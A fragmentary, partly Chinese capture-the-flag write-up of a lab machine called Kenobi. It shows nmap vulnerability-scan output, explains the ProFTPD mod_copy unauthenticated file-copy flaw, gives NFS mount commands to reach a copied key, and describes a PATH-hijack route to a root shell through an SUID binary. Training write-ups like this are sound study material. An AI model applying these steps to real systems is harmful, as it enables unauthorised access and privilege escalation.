This room will cover using accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary.
[email protected]:~# nmap -sV -sC --script vuln -oN kenobi 10.10.187.245 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-11 02:20 UTC Nmap scan report for ip-10.10.45.140.eu-west-1.compute.internal (10.10.45.140) Host is up (0.0013s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 |_sslv2-drown: 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /admin.html: Possible admin folder |_ /robots.txt: Robots file |_http-server-header: Apache/2.4.18 (Ubuntu) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 40361/tcp mountd | 100005 1,2,3 49262/udp mountd | 100021 1,3,4 43179/tcp nlockmgr | 100021 1,3,4 56568/udp nlockmgr | 100227 2,3 2049/tcp nfs_acl |_ 100227 2,3 2049/udp nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 2049/tcp open nfs_acl 2-3 (RPC #100227) MAC Address: 02:F2:65:5B:D2:FA (Unknown) Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |_
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 334.90 seconds
The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. mod_copy 模块实现了SITE CPFR和SITE CPTO命令,可以用来将文件/目录从服务器上的一个地方复制到另一个地方。任何未经认证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到指定路径。
因为在前面,可以看到目标机器允许挂载var目录,所以我们将密钥复制到var目录下
创建一个目录,并远程挂载目标机器的var
1 2
mkdir /mnt/kenobiNFS mount 10.10.45.140:/var /mnt/kenobiNFS
This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname). As this file runs as the root users privileges, we can manipulate our path gain a root shell.